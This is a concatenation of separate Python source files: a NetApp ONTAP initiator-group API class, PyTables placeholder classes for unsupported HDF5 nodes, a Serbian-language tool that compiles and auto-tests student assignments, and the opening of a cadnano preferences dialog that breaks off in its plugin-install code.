        # ONTAP API element name for this object.
        return "initiator-group-info"
    @staticmethod
    def get_desired_attrs():
        # Hyphenated attribute names requested from the ONTAP API.
        return [
            'initiator-group-alua-enabled',
            'initiator-group-throttle-borrow',
            'initiator-group-use-partner',
            'initiator-group-portset-name',
            'initiator-group-type',
            'initiator-group-vsa-enabled',
            'vserver',
            'initiator-group-throttle-reserve',
            'initiator-group-os-type',
            'lun-id',
            'initiators',
            'initiator-group-name',
            'initiator-group-report-scsi-name-enabled',
            'initiator-group-uuid',
        ]
    def describe_properties(self):
        # Property metadata used by NetAppObject validation/marshalling.
        # NOTE: `basestring` keeps this module Python-2 only, matching the
        # rest of the file.
        return {
            'initiator_group_alua_enabled': { 'class': bool, 'is_list': False, 'required': 'required' },
            'initiator_group_throttle_borrow': { 'class': bool, 'is_list': False, 'required': 'required' },
            'initiator_group_use_partner': { 'class': bool, 'is_list': False, 'required': 'optional' },
            'initiator_group_portset_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
            'initiator_group_type': { 'class': basestring, 'is_list': False, 'required': 'required' },
            'initiator_group_vsa_enabled': { 'class': bool, 'is_list': False, 'required': 'required' },
            'vserver': { 'class': basestring, 'is_list': False, 'required': 'optional' },
            'initiator_group_throttle_reserve': { 'class': int, 'is_list': False, 'required': 'required' },
            'initiator_group_os_type': { 'class': basestring, 'is_list': False, 'required': 'required' },
            'lun_id': { 'class': int, 'is_list': False, 'required': 'optional' },
            'initiators': { 'class': InitiatorInfo, 'is_list': True, 'required': 'optional' },
            'initiator_group_name': { 'class': basestring, 'is_list': False, 'required': 'required' },
            'initiator_group_report_scsi_name_enabled': { 'class': bool, 'is_list': False, 'required': 'optional' },
            'initiator_group_uuid': { 'class': basestring, 'is_list': False, 'required': 'optional' },
        }
|
########################################################################
#
# License: BSD
# Created: January 14, 2004
# Author: <NAME> - <EMAIL>
#
# $Id$
#
########################################################################
"""Here is defined the UnImplemented class.
See UnImplemented class docstring for more info.
Classes:
UnImplemented
Misc variables:
__version__
"""
import warnings
import numpy
from tables import hdf5Extension
from tables.utils import SizeType, lazyattr
from tables.node import Node
from tables.leaf import Leaf
from tables.attributeset import AttributeSet
__version__ = "$Revision$"
class UnImplemented(hdf5Extension.UnImplemented, Leaf):
    """
    This class represents datasets not supported by PyTables in an
    HDF5 file.
    When reading a generic HDF5 file (i.e. one that has not been
    created with PyTables, but with some other HDF5 library based
    tool), chances are that the specific combination of datatypes or
    dataspaces in some dataset might not be supported by PyTables yet.
    In such a case, this dataset will be mapped into an
    `UnImplemented` instance and the user will still be able to access
    the complete object tree of the generic HDF5 file. The user will
    also be able to *read and write the attributes* of the dataset,
    *access some of its metadata*, and perform *certain hierarchy
    manipulation operations* like deleting or moving (but not copying)
    the node. Of course, the user will not be able to read the actual
    data on it.
    This is an elegant way to allow users to work with generic HDF5
    files despite the fact that some of its datasets are not supported
    by PyTables. However, if you are really interested in having full
    access to an unimplemented dataset, please get in contact with the
    developer team.
    This class does not have any public instance variables or methods,
    except those inherited from the `Leaf` class.
    """
    # Class identifier.
    _c_classId = 'UNIMPLEMENTED'
    def __init__(self, parentNode, name):
        """Create the `UnImplemented` instance."""
        # UnImplemented objects always come from opening an existing node
        # (they can not be created).
        self._v_new = False
        """Is this the first time the node has been created?"""
        self.nrows = SizeType(0)
        """The length of the first dimension of the data."""
        self.shape = (SizeType(0),)
        """The shape of the stored data."""
        self.byteorder = None
        """
        The endianness of data in memory ('big', 'little' or
        'irrelevant').
        """
        # Leaf.__init__ hooks this node into the object tree; the real
        # shape/byteorder are filled in by _g_open() during that process.
        super(UnImplemented, self).__init__(parentNode, name)
    def _g_open(self):
        # _openUnImplemented() comes from the hdf5Extension C layer; it
        # returns the on-disk shape, the byte order and the HDF5 object id.
        (self.shape, self.byteorder, objectID) = \
            self._openUnImplemented()
        self.nrows = SizeType(self.shape[0])
        return objectID
    def _g_copy(self, newParent, newName, recursive, _log=True, **kwargs):
        """
        Do nothing.
        This method does nothing, but a ``UserWarning`` is issued.
        Please note that this method *does not return a new node*, but
        ``None``.
        """
        warnings.warn(
            "UnImplemented node %r does not know how to copy itself; skipping"
            % (self._v_pathname,))
        return None  # Can you see it?
    def _f_copy(self, newparent=None, newname=None,
                overwrite=False, recursive=False, createparents=False,
                **kwargs):
        """
        Do nothing.
        This method does nothing, since `UnImplemented` nodes can not
        be copied. However, a ``UserWarning`` is issued. Please note
        that this method *does not return a new node*, but ``None``.
        """
        # This also does nothing but warn.
        self._g_copy(newparent, newname, recursive, **kwargs)
        return None  # Can you see it?
    def __repr__(self):
        return """%s
  NOTE: <The UnImplemented object represents a PyTables unimplemented
  dataset present in the '%s' HDF5 file. If you want to see this
  kind of HDF5 dataset implemented in PyTables, please contact the
  developers.>
""" % (str(self), self._v_file.filename)
# Classes reported as H5G_UNKNOWN by HDF5
class Unknown(Node):
    """
    Placeholder for nodes reported as ``unknown`` by the underlying
    HDF5 library.

    Instances expose no public API beyond what `Node` provides; they
    exist only so the object tree remains traversable.
    """

    # Class identifier
    _c_classId = 'UNKNOWN'

    def __init__(self, parentNode, name):
        """Create the `Unknown` instance."""
        # Unknown nodes are only ever opened, never freshly created.
        self._v_new = False
        super(Unknown, self).__init__(parentNode, name)

    def _g_new(self, parentNode, name, init=False):
        # Nothing to set up for an unknown node.
        pass

    def _g_open(self):
        # No real HDF5 object id is available; report a dummy one.
        return 0

    def _g_copy(self, newParent, newName, recursive, _log=True, **kwargs):
        # Silently avoid doing copies of unknown nodes
        return None

    def _g_delete(self, parent):
        # Nothing of ours exists on disk, so deletion is a no-op.
        pass

    def __str__(self):
        classname = self.__class__.__name__
        pathname = self._v_pathname
        return "%s (%s)" % (pathname, classname)

    def __repr__(self):
        return """%s
  NOTE: <The Unknown object represents a node which is reported as
  unknown by the underlying HDF5 library, but that might be
  supported in more recent HDF5 versions.>
""" % (str(self))
# These are listed here for backward compatibility with PyTables 0.9.x indexes
class OldIndexArray(UnImplemented):
    """Unsupported index array from PyTables 0.9.x-era files, kept only
    so such nodes still load as `UnImplemented` placeholders."""
    _c_classId = 'IndexArray'
|
<reponame>mgornik/PEAN<gh_stars>0
# -*- coding: utf-8 -*-
import logging
import util
import os
import os.path as path
import re
import final_report
import datetime
import sys
import fnmatch
from util import bcolors
from os.path import join
from Queue import Queue
from shutil import copyfile
from threading import Thread
from testing_results import TestResults
from assignment_status import *
def execute_build_command(backend, config, criteria, comp, stations, current_assignment_path, autobuild_path):
    """
    Run the command that compiles a student's assignment.
    backend - currently active back-end
    config - global configuration of the review tool
    criteria - review criteria for the assignment (scoring, execution mode, etc.)
    comp - label of the computer on which the reviewed assignment was made
    stations - collection of computers and the students who worked on the
    assignment (key - computer label, value - list of student index number
    and student name/surname)
    current_assignment_path - path of the student assignment being compiled
    autobuild_path - path of the autobuild variant of the current assignment
    Side effects: on a failed build the build report is shown, the final
    report is marked ASSIGNMENT_STATUS_FAILS_TO_COMPILE and the process
    exits; user-facing messages are intentionally in Serbian.
    """
    logging.info('Pokrenuto je kompajliranje tekuceg projekta u direktorijumu: {0}'.format(current_assignment_path))
    build_report_path = join(autobuild_path, backend.get_build_report_filename())
    # Exit-code convention: 0 = clean build, 1 = built with warnings,
    # anything else = failure.
    code = internal_build_project(backend, config, criteria, current_assignment_path, autobuild_path)
    if code == 0:
        print bcolors.OKGREEN + 'Kompajliranje projekta je uspesno.' + bcolors.ENDC
    elif code == 1:
        print bcolors.FAIL + '''Kompajliranje projekta je generisalo upozorenja!
Mozete nastaviti sa izvrsenjem testova, ukoliko zelite da pregledate izvestaj o kompajliranju, on se nalazi u fajlu: "{0}"'''.format(backend.get_build_report_filename()) + bcolors.ENDC
    else:
        # An out-of-virtual-memory build is unrecoverable without a system
        # restart, so it is reported separately and aborts immediately.
        # NOTE(review): vm_build_error() is defined elsewhere in this module.
        if vm_build_error(build_report_path):
            util.fatal_error('''Kompajliranje projekta je neuspesno.
Razlog neuspeha je cinjenica da je sva virtuelna memorija potrosena.
Najbolje je da restartujete sistem pa potom nastavite pregled.''')
        else:
            print bcolors.FAIL \
                + 'Kompajliranje projekta je neuspesno. Bice prikazan fajl ("{0}") sa izvestajem kompajliranja.'\
                .format(backend.get_build_report_filename()) + bcolors.ENDC
            raw_input('Pritisnite <ENTER> za nastavak...')
            util.show_text_edit(config, build_report_path)
        final_report.update_final_report(config, criteria, stations, comp, datetime.datetime.now().isoformat(),
                                         status=ASSIGNMENT_STATUS_FAILS_TO_COMPILE)
        sys.exit(0)
def execute_run_tests_command(backend, config, criteria, stations, run_path, comp):
    """
    Run the command that executes all tests for an assignment.
    backend - currently active back-end
    config - global configuration of the review tool
    criteria - review criteria for the assignment (scoring, execution mode, etc.)
    stations - collection of computers and the students who worked on the
    assignment (key - computer label, value - list of student index number
    and student name/surname)
    run_path - path of the student assignment whose tests are executed
    comp - label of the computer on which the reviewed assignment was made
    Results are aggregated into the global execution_results via the
    worker threads fed through execution_queue, then summarised on the
    console (Serbian messages) and written to the final report.
    """
    if not path.isdir(config.AUTOTEST_PATH):
        util.fatal_error('''Prilikom postavljanja zadatka nije postavljena autotest varijanta zadatka.\n'
Ako zelite da koristite automatsko testiranje, kreirajte direktorijum "{0}" i postavite autotest varijantu u njega.'''.format(config.AUTOTEST_PATH))
    if not path.isdir(run_path):
        util.fatal_error('Ne mogu se pokrenuti testovi jer projekat nije prethodno kompajliran.\n'
                         + 'Upotrebite komandu build za kompajliranje projekta.')
    util.make_sure_path_exists(config.REPORTS_PATH)
    current_reports_path = join(config.REPORTS_PATH, comp)
    util.make_sure_path_exists(current_reports_path)
    util.clear_directory(current_reports_path)
    logging.info('Pokrenuti su automatski testovi tekuceg projekta u direktorijumu: {0}'.format(run_path))
    proj = util.identify_project_file(backend, run_path)
    executable = backend.identify_project_executable(proj)
    all_results = []
    tests = []
    # NOTE(review): score_distribution looks like a list of one-key dicts;
    # s.keys()[0] indexes a dict's keys and works on Python 2 only.
    for s in criteria.score_distribution:
        tests.append(s.keys()[0])
    # Schedule the test runs on (potentially) several worker threads:
    print('Sledeci testovi ce biti izvrseni: {0}'.format(', '.join(tests)))
    print('Svaki test se izvrsava {0} put(a)'.format(criteria.runs_spec['total']))
    for t in tests:
        execution_results[t] = [None] * criteria.runs_spec['total']
    for i in range(backend.get_parallel_testing_threads_count()):
        t = Thread(target = execution_worker_thread, args = (backend, criteria, i, run_path, executable))
        t.daemon = True
        t.start()
    for t in tests:
        test_index = 0
        for run in range(1, criteria.runs_spec['total'] + 1):
            execution_queue.put([test_index, t, get_console_report_path(config, comp, t, test_index)])
            test_index += 1
    # Block until every scheduled run has been processed by the workers.
    execution_queue.join()
    # Group the collected results - consolidate per individual test (by test name):
    for t in tests:
        results = execution_results[t]
        # Determine the longest execution time of this test:
        max_duration = results[0].duration
        executions = []
        for r in results:
            if r.duration > max_duration:
                max_duration = r.duration
            executions.append(r.result == 'passed')
        passes = sum(1 for x in results if x.result == 'passed')
        entry = TestResults(name = t,
                            runs = criteria.runs_spec['total'],
                            passes = passes,
                            failures = sum(1 for x in results if x.result != 'passed'),
                            test_fails = sum(1 for x in results if x.result == 'failed'),
                            crashes = sum(1 for x in results if x.result == 'crashed'),
                            time_outs = sum(1 for x in results if x.result == 'timed-out'),
                            total_duration = sum(x.duration for x in results),
                            max_duration = max_duration,
                            score = get_score(criteria, t)["percent"],
                            factor = get_score(criteria, t)["factor"],
                            success = (passes / float(criteria.runs_spec['total'])) >= criteria.runs_spec['pass_limit'],
                            executions = executions)
        all_results.append(entry)
    # Print a summary of the test runs to the console:
    total = len(criteria.score_distribution)
    passed = 0
    score = 0
    blockers = False
    for t in all_results:
        print ''
        header_line = 'TEST: {0}, ukupno izvrsenja: {1}'.format(t.name, t.runs)
        print '*' * len(header_line)
        print bcolors.BOLD + header_line + bcolors.ENDC
        print '*' * len(header_line)
        # NOTE(review): entries above are built with runs = runs_spec['total'],
        # so this "fewer runs than requested" branch appears unreachable — confirm.
        if t.runs < criteria.runs_spec['total']:
            print bcolors.FAIL \
                + 'Detektovano je dovoljno negativnih ishoda pa nije obavljeno svih {0} zahtevanih pokretanja'\
                .format(criteria.runs_spec['total']) + bcolors.ENDC
        if t.passes > 0:
            print bcolors.OKGREEN + 'PROSAO: {0} put(a)'.format(t.passes) + bcolors.ENDC
        if t.failures > 0:
            print bcolors.FAIL + 'PAO: {0} put(a), od toga:'.format(t.failures) + bcolors.ENDC
        if t.test_fails > 0:
            print bcolors.FAIL + ' Formirao los rezultat: {0} put(a)'.format(t.test_fails) + bcolors.ENDC
        if t.crashes > 0:
            print bcolors.FAIL + ' Nasilno prekinuo izvrsenje: {0} put(a)'.format(t.crashes) + bcolors.ENDC
        if t.time_outs > 0:
            print bcolors.FAIL + ' Prekoracio dozvoljeno vreme: {0} put(a)'.format(t.time_outs) + bcolors.ENDC
        print 'Ukupno vreme izvrsenja: {0}, najduze pokretanje: {1}'.format(t.total_duration, t.max_duration)
        if t.success:
            print bcolors.OKGREEN + 'Test se smatra uspesnim, tezina: {0} (od ukupno {1}), procentualno: {2:.2f}%'\
                .format(t.factor, criteria.total_weight, t.score) + bcolors.ENDC
            passed += 1
            score += t.score
        else:
            print bcolors.FAIL + 'Test se smatra neuspesnim' + bcolors.ENDC
            # A failed blocking test marks the whole assignment as blocked.
            if t in criteria.blocking_tests:
                blockers = True
                print bcolors.FAIL + 'Ovo je blokirajuci test!' + bcolors.ENDC
    print ''
    if passed == total:
        print bcolors.OKGREEN \
            + '''Uspesno su izvrseni svi testovi (ukupno je: {0} testova).\nUkupno ostvareno procenata: {1:.2f}%'''.format(total, score) + bcolors.ENDC
    else:
        failed = total - passed
        print bcolors.FAIL + '''Palo je {0} testova, od ukupno {1}!
Procenat testova koji prolaze: {2:.2f}%, procentualni ucinak: {3:.2f}%'''.format(failed, total, float(passed) / total * 100.0, score) + bcolors.ENDC
    status = ASSIGNMENT_STATUS_OK
    if blockers:
        print bcolors.FAIL + bcolors.BOLD \
            + 'Pao je makar jedan blokirajuci test! U izvestaju je naznaceno da u ovom radu postoje takvi testovi.' \
            + bcolors.ENDC
        status = ASSIGNMENT_STATUS_BLOCKED
    final_report.update_final_report(config, criteria, stations, comp, datetime.datetime.now().isoformat(),
                                     status=status, results=all_results)
def get_console_report_path(config, comp, test_name, unique_id):
    """
    Return the path of the file holding the console output of the given test.

    Console outputs live under config.REPORTS_PATH, in a subdirectory
    named after the computer.
    config - global configuration of the review tool
    comp - label of the computer on which the reviewed assignment was made
    test_name - name of the test whose console output is inspected
    unique_id - unique identifier of the test run (a single test keeps the
    same unique ID across every method dealing with test execution)
    """
    return os.path.join(
        config.REPORTS_PATH,
        comp,
        config.CONSOLE_REPORT_FILENAME.format(test_name, unique_id + 1))
def get_score(criteria, test_name):
    """
    Return the scoring entry for the given test.
    criteria - review criteria for the assignment (scoring, execution mode, etc.)
    test_name - name of the test whose scoring entry is fetched
    Returns the dict stored under *test_name* in criteria.score_distribution
    (a list of one-key dicts), or implicitly None when the test is absent.
    NOTE(review): `s.keys()[0]` / `s.values()[0]` subscript dict views and
    therefore work on Python 2 only — confirm before porting to Python 3.
    """
    for s in criteria.score_distribution:
        if s.keys()[0] == test_name:
            return s.values()[0]
# Queue used to hand scheduled test runs over to the worker threads:
execution_queue = Queue()
# Results of the test executions (worker threads fill this collection);
# key: test name, value: list with a summary of each individual run.
execution_results = {}
def do_execute(backend, criteria, ind, execute_dir, executable_file_path, test_index, test_name, report_path):
    """
    Body of a single worker-thread task: run one test and parse its artefacts.
    backend - currently active back-end
    criteria - review criteria for the assignment (scoring, execution mode, etc.)
    ind - index of the test run (1..N) - restarts from one for every new test
    executable_file_path - path of the executable (including its name),
    relative to execute_dir
    execute_dir - directory in which the run is started
    test_index - unique identifier of the test run
    test_name - name of the test being executed
    report_path - path of the file with the test's console output
    Returns the internal summary (a SingleRunResult object) of the run.
    """
    backend.execute_test(test_name, execute_dir, executable_file_path, test_index, report_path)
    try:
        return backend.parse_testing_artefacts(test_name, execute_dir, criteria.blocking_tests, test_index)
    except RuntimeError as err:
        # Artefact-parsing failures abort the whole review session.
        util.fatal_error(err.message)
def execution_worker_thread(backend, criteria, ind, execute_dir, executable_file_path):
    """Body of a worker thread that services test-execution requests.

    backend - back-end currently in use
    criteria - grading criteria for the assignment (scoring, execution mode, ...)
    ind - test-run index (1..N) - restarts from one for every new test
    execute_dir - directory in which execution is initiated
    executable_file_path - relative path to the executable file (including its
        name) - relative to execute_dir

    Work items arrive on the global execution_queue as
    (test_index, test_name, report_path) tuples; results are aggregated into
    the global execution_results dict, keyed by test name, with one entry per
    individual run.  The loop runs until the process exits.
    """
    logging.debug('Radna nit za pokretanje testova pod indeksom {0} je pokrenuta'.format(ind))
    logging.debug('Parametri niti: run_path: "{0}", executable: "{1}"'.format(execute_dir, executable_file_path))
    while True:
        test_index, test_name, report_path = execution_queue.get()
        logging.debug('Nit {0} preuzela je test pod indeksom: {1}, naziv testa: {2}'.format(ind, test_index, test_name))
        run_result = do_execute(backend, criteria, ind, execute_dir, executable_file_path,
                                test_index, test_name, report_path)
        execution_results[test_name][test_index] = run_result
        execution_queue.task_done()
        logging.debug('Nit {0} zavrsila je pokretanje testa'.format(ind))
def filename_matches_assignment_pattern(backend, file):
    """Return True when *file* matches any of the backend's assignment-file glob patterns."""
    patterns = backend.get_assignment_files_pattern()
    return any(fnmatch.fnmatch(file, pattern) for pattern in patterns)
def internal_build_project(backend, config, criteria, current_assignment_path, autobuild_path):
    """Internal helper that compiles a project (student assignment).

    backend - back-end currently in use
    config - global configuration of the grading tool
    criteria - grading criteria for the assignment (scoring, execution mode, ...)
    current_assignment_path - path of the assignment being compiled
    autobuild_path - path holding the autobuild variant of the current assignment

    Returns an indication of how compilation went:
    0 - compilation succeeded
    1 - an executable was produced but the build reported warnings
    2 - compilation failed
    """
    logging.info('Pokrenuto je kompajliranje projekta u direktorijumu: {0}'.format(current_assignment_path))
    # Wipe the current contents of the autobuild directory:
    print('Brisanje sadrzaja direktorijuma "{0}"'.format(autobuild_path))
    util.make_sure_path_exists(autobuild_path)
    util.clear_directory(autobuild_path)
    # Copy all files from the base directory into the autobuild subdirectory:
    print('Kopiranje izvornih fajlova iz "{0}" u "{1}"'.format(current_assignment_path, autobuild_path))
    onlyfiles = [f for f in os.listdir(current_assignment_path) if path.isfile(join(current_assignment_path, f))]
    autotestfiles = [f for f in os.listdir(config.AUTOTEST_PATH) if path.isfile(join(config.AUTOTEST_PATH, f))]
    for f in onlyfiles:
        # Copy files the students edit, plus any file matching the backend's
        # assignment pattern that is not shadowed by an autotest file.
        if (f in criteria.assignment_files) or (f not in autotestfiles and filename_matches_assignment_pattern(backend, f)):
            copyfile(join(current_assignment_path, f), join(autobuild_path, f))
    # Fire the event that runs before the assignment is compiled:
    try:
        backend.before_build(autobuild_path)
    except RuntimeError as err:
        # RuntimeError has no .message attribute on Python 3; str(err) works on both.
        util.fatal_error(str(err))
    # Copy the extra files from the autotest directory into the autobuild subdirectory:
    print('Kopiranje autotest fajlova iz "{0}" u "{1}"'.format(config.AUTOTEST_PATH, autobuild_path))
    if not autotestfiles:
        util.fatal_error(
            'Projekat se ne moze kompajlirati jer autotest varijanta zadatka nije postavljena u direktorijum: "{0}"!'
            .format(config.AUTOTEST_PATH))
    for f in autotestfiles:
        # Check whether the file is listed among the files in which students
        # write their solution.  If so, it must not be placed in the autotest
        # folder, because copying it would overwrite the student's solution.
        if f in criteria.assignment_files:
            util.fatal_error('''Fajl "{0}" je postavljen u "{1}" direktorijum a ocekuje se da studenti unose svoje resenje u taj fajl.
Fajlovi iz "{1}" direktorijuma kopiraju se preko studentskog resenja, tako da bi kopiranjem ovog fajla unistili kljucni deo resenja.
Molim da procitate deo uputstva za koriscenje alata za pregled koji se odnosi na postavljanje fajlova u ovaj direktorijum.'''.format(f, config.AUTOTEST_PATH))
        copyfile(join(config.AUTOTEST_PATH, f), join(autobuild_path, f))
    # Next, compile the project (the original stored the result in an unused
    # local variable; the return value is not needed here):
    backend.build_project(util.identify_project_file(backend, autobuild_path))
    # The last line of the build report should carry the error/warning counts;
    # use a context manager so the report file is always closed.
    with open(join(autobuild_path, backend.get_build_report_filename()), 'r') as report:
        lines = report.readlines()
    last_line = lines[-1]
    # Raw string so \d and \s are real regex escapes (non-raw form is a
    # DeprecationWarning on modern Python):
    regex = re.compile(r'(?P<errors>\d+)\serror\(s\),\s(?P<warnings>\d+)\swarning\(s\)', re.IGNORECASE)
    m = regex.match(last_line)
    if m:
        errors = int(m.group('errors'))
        warnings = int(m.group('warnings'))
        if errors == 0 and warnings == 0:
            return 0
        if errors == 0:
            return 1
        return 2
    else:
        util.fatal_error('''Interna greska: izvestaj o kompajliranju ne sadrzi poslednju liniju sa brojem gresaka i upozorenja.
Nije moguce utvrditi ishod kompajliranja. Potrebno je kontaktirati autora alata.''')
def vm_build_error(build_report_path):
    """Check whether a build failure stems from a Code::Blocks environment problem.

    build_report_path - path to the project's build report

    Returns True when the report contains a line starting with
    "virtual memory exhausted" (case-insensitive).
    """
    # Context manager so the report file is always closed (the original
    # leaked the file handle).
    with open(build_report_path, 'r') as report:
        text = report.read()
    regex = re.compile('^virtual memory exhausted', re.MULTILINE | re.IGNORECASE)
    return regex.search(text) is not None
from ui.dialogs.ui_preferences import Ui_Preferences
from views import styles
import util
import cadnano
import os.path, zipfile, shutil, platform, subprocess, tempfile, errno
util.qtWrapImport('QtCore', globals(), ['QObject', 'QSettings', 'pyqtSlot', 'Qt'])
util.qtWrapImport('QtWidgets', globals(), ['QWidget', 'QDialogButtonBox',
'QTableWidgetItem', 'QFileDialog',
'QMessageBox'])
class Preferences(object):
    """Mode-less preferences dialog.

    Persists lattice/UI settings through QSettings (group "Preferences") and
    handles installation of cadnano plugin archives (*.cnp) into the
    plugins folder, escalating privileges on OS X / Linux when needed.
    """
    def __init__(self):
        self.qs = QSettings()
        self.uiPrefs = Ui_Preferences()
        self.widget = QWidget()
        self.uiPrefs.setupUi(self.widget)
        self.readPreferences()
        self.widget.addAction(self.uiPrefs.actionClose)
        # Wire every editor widget to the setter that persists its value.
        self.uiPrefs.actionClose.triggered.connect(self.hideDialog)
        self.uiPrefs.honeycombRowsSpinBox.valueChanged.connect(self.setHoneycombRows)
        self.uiPrefs.honeycombColsSpinBox.valueChanged.connect(self.setHoneycombCols)
        self.uiPrefs.honeycombStepsSpinBox.valueChanged.connect(self.setHoneycombSteps)
        self.uiPrefs.squareRowsSpinBox.valueChanged.connect(self.setSquareRows)
        self.uiPrefs.squareColsSpinBox.valueChanged.connect(self.setSquareCols)
        self.uiPrefs.squareStepsSpinBox.valueChanged.connect(self.setSquareSteps)
        self.uiPrefs.autoScafComboBox.currentIndexChanged.connect(self.setAutoScaf)
        self.uiPrefs.defaultToolComboBox.currentIndexChanged.connect(self.setStartupTool)
        self.uiPrefs.zoomSpeedSlider.valueChanged.connect(self.setZoomSpeed)
        # self.uiPrefs.helixAddCheckBox.toggled.connect(self.setZoomToFitOnHelixAddition)
        self.uiPrefs.buttonBox.clicked.connect(self.handleButtonClick)
        self.uiPrefs.addPluginButton.clicked.connect(self.addPlugin)

    def showDialog(self):
        """Reload stored settings into the widgets, then show the dialog."""
        # self.exec_()
        self.readPreferences()
        self.widget.show()  # launch prefs in mode-less dialog

    def hideDialog(self):
        self.widget.hide()

    # @pyqtSlot(object)
    def handleButtonClick(self, button):
        """
        Restores defaults. Other buttons are ignored because connections
        are already set up in qt designer.
        """
        if self.uiPrefs.buttonBox.buttonRole(button) == QDialogButtonBox.ResetRole:
            self.restoreDefaults()

    def readPreferences(self):
        """Load settings (falling back to styles defaults) and push them into the UI."""
        self.qs.beginGroup("Preferences")
        self.honeycombRows = self.qs.value("honeycombRows", styles.HONEYCOMB_PART_MAXROWS)
        self.honeycombCols = self.qs.value("honeycombCols", styles.HONEYCOMB_PART_MAXCOLS)
        self.honeycombSteps = self.qs.value("honeycombSteps", styles.HONEYCOMB_PART_MAXSTEPS)
        self.squareRows = self.qs.value("squareRows", styles.SQUARE_PART_MAXROWS)
        self.squareCols = self.qs.value("squareCols", styles.SQUARE_PART_MAXCOLS)
        self.squareSteps = self.qs.value("squareSteps", styles.SQUARE_PART_MAXSTEPS)
        self.autoScafIndex = self.qs.value("autoScaf", styles.PREF_AUTOSCAF_INDEX)
        self.startupToolIndex = self.qs.value("startupTool", styles.PREF_STARTUP_TOOL_INDEX)
        self.zoomSpeed = self.qs.value("zoomSpeed", styles.PREF_ZOOM_SPEED)
        self.zoomOnHelixAdd = self.qs.value("zoomOnHelixAdd", styles.PREF_ZOOM_AFTER_HELIX_ADD)
        self.qs.endGroup()
        self.uiPrefs.honeycombRowsSpinBox.setProperty("value", self.honeycombRows)
        self.uiPrefs.honeycombColsSpinBox.setProperty("value", self.honeycombCols)
        self.uiPrefs.honeycombStepsSpinBox.setProperty("value", self.honeycombSteps)
        self.uiPrefs.squareRowsSpinBox.setProperty("value", self.squareRows)
        self.uiPrefs.squareColsSpinBox.setProperty("value", self.squareCols)
        self.uiPrefs.squareStepsSpinBox.setProperty("value", self.squareSteps)
        self.uiPrefs.autoScafComboBox.setCurrentIndex(self.autoScafIndex)
        self.uiPrefs.defaultToolComboBox.setCurrentIndex(self.startupToolIndex)
        self.uiPrefs.zoomSpeedSlider.setProperty("value", self.zoomSpeed)
        # Show the currently loaded plugins as a read-only single-column table.
        ptw = self.uiPrefs.pluginTableWidget
        loadedPluginPaths = list(cadnano.loadedPlugins.keys())
        ptw.setRowCount(len(loadedPluginPaths))
        for i in range(len(loadedPluginPaths)):
            row = QTableWidgetItem(loadedPluginPaths[i])
            row.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
            ptw.setItem(i, 0, row)
        # self.uiPrefs.helixAddCheckBox.setChecked(self.zoomOnHelixAdd)

    def restoreDefaults(self):
        """Reset every editor widget to the styles defaults (setters persist the values)."""
        self.uiPrefs.honeycombRowsSpinBox.setProperty("value", styles.HONEYCOMB_PART_MAXROWS)
        self.uiPrefs.honeycombColsSpinBox.setProperty("value", styles.HONEYCOMB_PART_MAXCOLS)
        self.uiPrefs.honeycombStepsSpinBox.setProperty("value", styles.HONEYCOMB_PART_MAXSTEPS)
        self.uiPrefs.squareRowsSpinBox.setProperty("value", styles.SQUARE_PART_MAXROWS)
        self.uiPrefs.squareColsSpinBox.setProperty("value", styles.SQUARE_PART_MAXCOLS)
        self.uiPrefs.squareStepsSpinBox.setProperty("value", styles.SQUARE_PART_MAXSTEPS)
        self.uiPrefs.autoScafComboBox.setCurrentIndex(styles.PREF_AUTOSCAF_INDEX)
        self.uiPrefs.defaultToolComboBox.setCurrentIndex(styles.PREF_STARTUP_TOOL_INDEX)
        self.uiPrefs.zoomSpeedSlider.setProperty("value", styles.PREF_ZOOM_SPEED)
        # self.uiPrefs.helixAddCheckBox.setChecked(styles.PREF_ZOOM_AFTER_HELIX_ADD)

    def setHoneycombRows(self, rows):
        self.honeycombRows = rows
        self.qs.beginGroup("Preferences")
        self.qs.setValue("honeycombRows", self.honeycombRows)
        self.qs.endGroup()

    def setHoneycombCols(self, cols):
        self.honeycombCols = cols
        self.qs.beginGroup("Preferences")
        self.qs.setValue("honeycombCols", self.honeycombCols)
        self.qs.endGroup()

    def setHoneycombSteps(self, steps):
        self.honeycombSteps = steps
        self.qs.beginGroup("Preferences")
        self.qs.setValue("honeycombSteps", self.honeycombSteps)
        self.qs.endGroup()

    def setSquareRows(self, rows):
        self.squareRows = rows
        self.qs.beginGroup("Preferences")
        self.qs.setValue("squareRows", self.squareRows)
        self.qs.endGroup()

    def setSquareCols(self, cols):
        self.squareCols = cols
        self.qs.beginGroup("Preferences")
        self.qs.setValue("squareCols", self.squareCols)
        self.qs.endGroup()

    def setSquareSteps(self, steps):
        self.squareSteps = steps
        self.qs.beginGroup("Preferences")
        self.qs.setValue("squareSteps", self.squareSteps)
        self.qs.endGroup()

    def setAutoScaf(self, index):
        self.autoScafIndex = index
        self.qs.beginGroup("Preferences")
        self.qs.setValue("autoScaf", self.autoScafIndex)
        self.qs.endGroup()

    def setStartupTool(self, index):
        self.startupToolIndex = index
        self.qs.beginGroup("Preferences")
        self.qs.setValue("startupTool", self.startupToolIndex)
        self.qs.endGroup()

    def setZoomSpeed(self, speed):
        self.zoomSpeed = speed
        self.qs.beginGroup("Preferences")
        self.qs.setValue("zoomSpeed", self.zoomSpeed)
        self.qs.endGroup()

    # def setZoomToFitOnHelixAddition(self, checked):
    #     self.zoomOnHelixAdd = checked
    #     self.qs.beginGroup("Preferences")
    #     self.qs.setValue("zoomOnHelixAdd", self.zoomOnHelixAdd)
    #     self.qs.endGroup()

    def getAutoScafType(self):
        return ['Mid-seam', 'Raster'][self.autoScafIndex]

    def getStartupToolName(self):
        return ['Select', 'Pencil', 'Paint', 'AddSeq'][self.startupToolIndex]

    def addPlugin(self):
        """Open a file dialog so the user can pick a *.cnp plugin archive to install."""
        fdialog = QFileDialog(
            self.widget,
            "Install Plugin",
            cadnano.path(),
            "Cadnano Plugins (*.cnp)")
        fdialog.setAcceptMode(QFileDialog.AcceptOpen)
        fdialog.setWindowFlags(Qt.Sheet)
        fdialog.setWindowModality(Qt.WindowModal)
        fdialog.filesSelected.connect(self.addPluginAtPath)
        # Keep a reference so the dialog isn't garbage-collected while open.
        self.fileopendialog = fdialog
        fdialog.open()

    def addPluginAtPath(self, fname):
        """Extract the chosen plugin zip to a temp dir and move it into the plugins folder."""
        self.fileopendialog.close()
        fname = str(fname[0])
        print("Attempting to open plugin %s"%fname)
        try:
            zf = zipfile.ZipFile(fname, 'r')
        except Exception as e:
            self.failWithMsg("Plugin file seems corrupt: %s."%e)
            return
